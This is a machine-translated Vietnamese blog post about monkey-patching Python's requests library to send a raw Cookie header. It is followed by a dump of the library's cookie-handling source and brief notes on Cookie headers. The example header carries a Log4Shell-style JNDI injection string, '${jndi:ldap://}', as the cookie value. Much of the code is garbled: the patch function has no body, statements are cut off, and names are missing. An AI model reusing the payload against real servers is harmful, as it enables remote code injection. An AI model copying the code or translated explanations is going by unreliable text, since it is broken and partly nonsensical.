Cookie yêu cầu HTTP Python

Thường thì bài viết của mình là dài, nhưng hôm nay mình chỉ đưa ra một giải pháp để khi cần lại có thể dễ dàng tìm lại 😄

import requests

def prepare_cookies(self, cookies):

requests.models.PreparedRequest.prepare_cookies = prepare_cookies

Khỉ vá hàm. Thật thô thiển, nhưng không có lựa chọn nào khác

“A ha. ”, bạn có thể nói, tràn ngập các tài liệu, “Thư viện Yêu cầu cho phép bạn sửa đổi các tiêu đề bằng API móc sự kiện. ” Điều đó thật tuyệt, nhưng than ôi,. Vì vậy, chúng tôi bị mắc kẹt với việc vá khỉ, tốt hơn hoặc xấu hơn

Vấn đề

Đáng buồn thay, thư viện Yêu cầu dành cho Python sẽ không cho phép bạn chuyển tiêu đề cookie của riêng bạn. Thay vào đó, Yêu cầu yêu cầu bạn chuyển vào cookies như một kwarg riêng biệt

Có lẽ điều này phù hợp với hầu hết mọi người, nhưng tôi nhận thấy mình cần gửi một số dữ liệu đến máy chủ nơi tôi có thể kiểm soát hoàn toàn giá trị của cookie: dưới dạng giá trị chuỗi ký tự, không bị thao túng, xác thực hoặc diễn giải

headers = {
    # the value of 'cookie' below here will get dropped
    'cookie': '${jndi:ldap://}',
    'origin': '',
    'content-type': 'text/plain;charset=UTF-8',
    'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36'

requests.get(url, headers=headers)

Yêu cầu trên sẽ âm thầm loại bỏ tiêu đề cookie, dẫn đến một giờ gỡ lỗi và khiến bạn đặt câu hỏi về sự tỉnh táo của mình

Rất may, sau khi khỉ vá thư viện, bạn sẽ thấy giá trị cookie của mình không bị ảnh hưởng bởi những người trợ giúp tiêu đề háo hức của thư viện yêu cầu

Mã nguồn cho các yêu cầu. bánh quy


Compatibility code to be able to use `cookielib.CookieJar` with requests.

requests.utils imports from here, so be careful with imports.

import calendar
import copy
import time

from ._internal_utils import to_native_string
from .compat import Morsel, MutableMapping, cookielib, urlparse, urlunparse

    import threading
except ImportError:
    import dummy_threading as threading

class MockRequest:
    """Wraps a `requests.Request` to mimic a `urllib2.Request`.

    The code in `cookielib.CookieJar` expects this interface in order to correctly
    manage cookie policies, i.e., determine whether a cookie can be set, given the
    domains of the request and the cookie.

    The original request object is read-only. The client is responsible for collecting
    the new headers via `get_new_headers()` and interpreting them appropriately. You
    probably want `get_cookie_header`, defined below.

    def __init__(self, request):
        self._r = request
        self._new_headers = {}
        self.type = urlparse(self._r.url).scheme

    def get_type(self):
        return self.type

    def get_host(self):
        return urlparse(self._r.url).netloc

    def get_origin_req_host(self):
        return self.get_host()

    def get_full_url(self):
        # Only return the response's URL if the user hadn't set the Host
        # header
        if not self._r.headers.get("Host"):
            return self._r.url
        # If they did set it, retrieve it and reconstruct the expected domain
        host = to_native_string(self._r.headers["Host"], encoding="utf-8")
        parsed = urlparse(self._r.url)
        # Reconstruct the URL as we expect it
        return urlunparse(

    def is_unverifiable(self):
        return True

    def has_header(self, name):
        return name in self._r.headers or name in self._new_headers

    def get_header(self, name, default=None):
        return self._r.headers.get(name, self._new_headers.get(name, default))

    def add_header(self, key, val):
        """cookielib has no legitimate use for this method; add it back if you find one."""
        raise NotImplementedError(
            "Cookie headers should be added with add_unredirected_header()"

    def add_unredirected_header(self, name, value):
        self._new_headers[name] = value

    def get_new_headers(self):
        return self._new_headers

    def unverifiable(self):
        return self.is_unverifiable()

    def origin_req_host(self):
        return self.get_origin_req_host()

    def host(self):
        return self.get_host()

class MockResponse:
    """Wraps a `httplib.HTTPMessage` to mimic a `urllib.addinfourl`.

    ...what? Basically, expose the parsed HTTP headers from the server response
    the way `cookielib` expects to see them.

    def __init__(self, headers):
        """Make a MockResponse for `cookielib` to read.

        :param headers: a httplib.HTTPMessage or analogous carrying the headers
        self._headers = headers

    def info(self):
        return self._headers

    def getheaders(self, name):

def extract_cookies_to_jar(jar, request, response):
    """Extract the cookies from the response into a CookieJar.

    :param jar: cookielib.CookieJar (not necessarily a RequestsCookieJar)
    :param request: our own requests.Request object
    :param response: urllib3.HTTPResponse object
    if not (hasattr(response, "_original_response") and response._original_response):
    # the _original_response field is the wrapped httplib.HTTPResponse object,
    req = MockRequest(request)
    # pull out the HTTPMessage with the headers and put it in the mock:
    res = MockResponse(response._original_response.msg)
    jar.extract_cookies(res, req)

def get_cookie_header(jar, request):
    Produce an appropriate Cookie header string to be sent with `request`, or None.

    :rtype: str
    r = MockRequest(request)
    return r.get_new_headers().get("Cookie")

def remove_cookie_by_name(cookiejar, name, domain=None, path=None):
    """Unsets a cookie by name, by default over all domains and paths.

    Wraps CookieJar.clear(), is O(n).
    clearables = []
    for cookie in cookiejar:
        if != name:
        if domain is not None and domain != cookie.domain:
        if path is not None and path != cookie.path:
        clearables.append((cookie.domain, cookie.path,

    for domain, path, name in clearables:
        cookiejar.clear(domain, path, name)

[docs]class CookieConflictError(RuntimeError): """There are two cookies that meet the criteria specified in the cookie jar. Use .get and .set and include domain and path args in order to be more specific. """

[docs]class RequestsCookieJar(cookielib.CookieJar, MutableMapping): """Compatibility class; is a cookielib.CookieJar, but exposes a dict interface. This is the CookieJar we create by default for requests and sessions that don't specify one, since some clients may expect response.cookies and session.cookies to support dict operations. Requests does not use the dict interface internally; it's just for compatibility with external client code. All requests code should work out of the box with externally provided instances of ``CookieJar``, e.g. ``LWPCookieJar`` and ``FileCookieJar``. Unlike a regular CookieJar, this class is pickleable. . warning:: dictionary operations that are normally O(1) may be O(n). """

[docs] def get(self, name, default=None, domain=None, path=None): """Dict-like get() that also supports optional domain and path args in order to resolve naming collisions from using one cookie jar over multiple domains. . warning:: operation is O(n), not O(1). """ try: return self._find_no_duplicates(name, domain, path) except KeyError: return default

[docs] def set(self, name, value, **kwargs): """Dict-like set() that also supports optional domain and path args in order to resolve naming collisions from using one cookie jar over multiple domains. """ # support client code that unsets cookies by assignment of a None value: if value is None: remove_cookie_by_name( self, name, domain=kwargs.get("domain"), path=kwargs.get("path") ) return if isinstance(value, Morsel): c = morsel_to_cookie(value) else: c = create_cookie(name, value, **kwargs) self.set_cookie(c) return c

[docs] def iterkeys(self): """Dict-like iterkeys() that returns an iterator of names of cookies from the jar. . seealso:: itervalues() and iteritems(). """ for cookie in iter(self): yield

[docs] def keys(self): """Dict-like keys() that returns a list of names of cookies from the jar. . seealso:: values() and items(). """ return list(self.iterkeys())

[docs] def itervalues(self): """Dict-like itervalues() that returns an iterator of values of cookies from the jar. . seealso:: iterkeys() and iteritems(). """ for cookie in iter(self): yield cookie.value

[docs] def values(self): """Dict-like values() that returns a list of values of cookies from the jar. . seealso:: keys() and items(). """ return list(self.itervalues())

[docs] def iteritems(self): """Dict-like iteritems() that returns an iterator of name-value tuples from the jar. . seealso:: iterkeys() and itervalues(). """ for cookie in iter(self): yield, cookie.value

[docs] def items(self): """Dict-like items() that returns a list of name-value tuples from the jar. Allows client-code to call ``dict(RequestsCookieJar)`` and get a vanilla python dict of key value pairs. . seealso:: keys() and values(). """ return list(self.iteritems())

[docs] def list_domains(self): """Utility method to list all the domains in the jar.""" domains = [] for cookie in iter(self): if cookie.domain not in domains: domains.append(cookie.domain) return domains

[docs] def list_paths(self): """Utility method to list all the paths in the jar.""" paths = [] for cookie in iter(self): if cookie.path not in paths: paths.append(cookie.path) return paths

[docs] def multiple_domains(self): """Returns True if there are multiple domains in the jar. Returns False otherwise. :rtype: bool """ domains = [] for cookie in iter(self): if cookie.domain is not None and cookie.domain in domains: return True domains.append(cookie.domain) return False # there is only one domain in jar

[docs] def get_dict(self, domain=None, path=None): """Takes as an argument an optional domain and path and returns a plain old Python dict of name-value pairs of cookies that meet the requirements. :rtype: dict """ dictionary = {} for cookie in iter(self): if (domain is None or cookie.domain == domain) and ( path is None or cookie.path == path ): dictionary[] = cookie.value return dictionary

def __contains__(self, name): try: return super().__contains__(name) except CookieConflictError: return True def __getitem__(self, name): """Dict-like __getitem__() for compatibility with client code. Throws exception if there are more than one cookie with name. In that case, use the more explicit get() method instead. . warning:: operation is O(n), not O(1). """ return self._find_no_duplicates(name) def __setitem__(self, name, value): """Dict-like __setitem__ for compatibility with client code. Throws exception if there is already a cookie of that name in the jar. In that case, use the more explicit set() method instead. """ self.set(name, value) def __delitem__(self, name): """Deletes a cookie given a name. Wraps ``cookielib.CookieJar``'s ``remove_cookie_by_name()``. """ remove_cookie_by_name(self, name)

[docs] def update(self, other): """Updates this jar with cookies from another CookieJar or dict-like""" if isinstance(other, cookielib.CookieJar): for cookie in other: self.set_cookie(copy.copy(cookie)) else: super().update(other)

def _find(self, name, domain=None, path=None): """Requests uses this method internally to get cookie values. If there are conflicting cookies, _find arbitrarily chooses one. See _find_no_duplicates if you want an exception thrown if there are conflicting cookies. :param name: a string containing name of cookie :param domain: (optional) string containing domain of cookie :param path: (optional) string containing path of cookie :return: cookie.value """ for cookie in iter(self): if == name: if domain is None or cookie.domain == domain: if path is None or cookie.path == path: return cookie.value raise KeyError(f"name={name!r}, domain={domain!r}, path={path!r}") def _find_no_duplicates(self, name, domain=None, path=None): """Both ``__get_item__`` and ``get`` call this function: it's never used elsewhere in Requests. :param name: a string containing name of cookie :param domain: (optional) string containing domain of cookie :param path: (optional) string containing path of cookie :raises KeyError: if cookie is not found :raises CookieConflictError: if there are multiple cookies that match name and optionally domain and path :return: cookie.value """ toReturn = None for cookie in iter(self): if == name: if domain is None or cookie.domain == domain: if path is None or cookie.path == path: if toReturn is not None: # if there are multiple cookies that meet passed in criteria raise CookieConflictError( f"There are multiple cookies with name, {name!r}" ) # we will eventually return this as long as no cookie conflict toReturn = cookie.value if toReturn: return toReturn raise KeyError(f"name={name!r}, domain={domain!r}, path={path!r}") def __getstate__(self): """Unlike a normal CookieJar, this class is pickleable.""" state = self.__dict__.copy() # remove the unpickleable RLock object state.pop("_cookies_lock") return state def __setstate__(self, state): """Unlike a normal CookieJar, this class is pickleable.""" self.__dict__.update(state) if "_cookies_lock" not in self.__dict__: self._cookies_lock = threading.RLock()

[docs] def copy(self): """Return a copy of this RequestsCookieJar.""" new_cj = RequestsCookieJar() new_cj.set_policy(self.get_policy()) new_cj.update(self) return new_cj

[docs] def get_policy(self): """Return the CookiePolicy instance used.""" return self._policy

def _copy_cookie_jar(jar): if jar is None: return None if hasattr(jar, "copy"): # We're dealing with an instance of RequestsCookieJar return jar.copy() # We're dealing with a generic CookieJar instance new_jar = copy.copy(jar) new_jar.clear() for cookie in jar: new_jar.set_cookie(copy.copy(cookie)) return new_jar def create_cookie(name, value, **kwargs): """Make a cookie from underspecified parameters. By default, the pair of `name` and `value` will be set for the domain '' and sent on every request (this is sometimes called a "supercookie"). """ result = { "version": 0, "name": name, "value": value, "port": None, "domain": "", "path": "/", "secure": False, "expires": None, "discard": True, "comment": None, "comment_url": None, "rest": {"HttpOnly": None}, "rfc2109": False, } badargs = set(kwargs) - set(result) if badargs: raise TypeError( f"create_cookie() got unexpected keyword arguments: {list(badargs)}" ) result.update(kwargs) result["port_specified"] = bool(result["port"]) result["domain_specified"] = bool(result["domain"]) result["domain_initial_dot"] = result["domain"].startswith(".") result["path_specified"] = bool(result["path"]) return cookielib.Cookie(**result) def morsel_to_cookie(morsel): """Convert a Morsel object into a Cookie containing the one k/v pair.""" expires = None if morsel["max-age"]: try: expires = int(time.time() + int(morsel["max-age"])) except ValueError: raise TypeError(f"max-age: {morsel['max-age']} must be integer") elif morsel["expires"]: time_template = "%a, %d-%b-%Y %H:%M:%S GMT" expires = calendar.timegm(time.strptime(morsel["expires"], time_template)) return create_cookie( comment=morsel["comment"], comment_url=bool(morsel["comment"]), discard=False, domain=morsel["domain"], expires=expires, name=morsel.key, path=morsel["path"], port=None, rest={"HttpOnly": morsel["httponly"]}, rfc2109=False, secure=bool(morsel["secure"]), value=morsel.value, version=morsel["version"] or 0, )

[docs]def cookiejar_from_dict(cookie_dict, cookiejar=None, overwrite=True): """Returns a CookieJar from a key/value dictionary. :param cookie_dict: Dict of key/values to insert into CookieJar. :param cookiejar: (optional) A cookiejar to add the cookies to. :param overwrite: (optional) If False, will not replace cookies already in the jar with new ones. :rtype: CookieJar """ if cookiejar is None: cookiejar = RequestsCookieJar() if cookie_dict is not None: names_from_jar = [ for cookie in cookiejar] for name in cookie_dict: if overwrite or (name not in names_from_jar): cookiejar.set_cookie(create_cookie(name, cookie_dict[name])) return cookiejar

def merge_cookies(cookiejar, cookies): """Add cookies to cookiejar and returns a merged CookieJar. :param cookiejar: CookieJar object to add the cookies to. :param cookies: Dictionary or CookieJar object to be added. :rtype: CookieJar """ if not isinstance(cookiejar, cookielib.CookieJar): raise ValueError("You can only merge into CookieJar") if isinstance(cookies, dict): cookiejar = cookiejar_from_dict(cookies, cookiejar=cookiejar, overwrite=False) elif isinstance(cookies, cookielib.CookieJar): try: cookiejar.update(cookies) except AttributeError: for cookie_in_jar in cookies: cookiejar.set_cookie(cookie_in_jar) return cookiejar

Để gửi yêu cầu HTTP có Cookie, bạn cần thêm "Cookie. name=value" theo yêu cầu của bạn . Để gửi nhiều cookie trong một tiêu đề Cookie, hãy tách chúng bằng dấu chấm phẩy hoặc thêm nhiều "Cookie. tên=giá trị" tiêu đề yêu cầu.
Tiêu đề Set-Cookie được máy chủ gửi để phản hồi yêu cầu HTTP, được sử dụng để tạo cookie trên hệ thống của người dùng . Tiêu đề Cookie được ứng dụng khách bao gồm với yêu cầu HTTP được gửi đến máy chủ, nếu có cookie có miền và đường dẫn phù hợp.
Tiêu đề yêu cầu HTTP Cookie chứa các cookie HTTP đã lưu trữ được liên kết với máy chủ (i. e. được máy chủ gửi trước đó với tiêu đề Set-Cookie hoặc được đặt trong JavaScript bằng Tài liệu. bánh quy ). Tiêu đề Cookie là tùy chọn và có thể được bỏ qua nếu, ví dụ: cài đặt quyền riêng tư của trình duyệt chặn cookie.
Cookie là tiêu đề yêu cầu HTTP i. e. được sử dụng trong các yêu cầu do người dùng gửi đến máy chủ . Nó chứa các cookie được máy chủ gửi trước đó bằng cách sử dụng cookie đặt. Nó là một tiêu đề tùy chọn.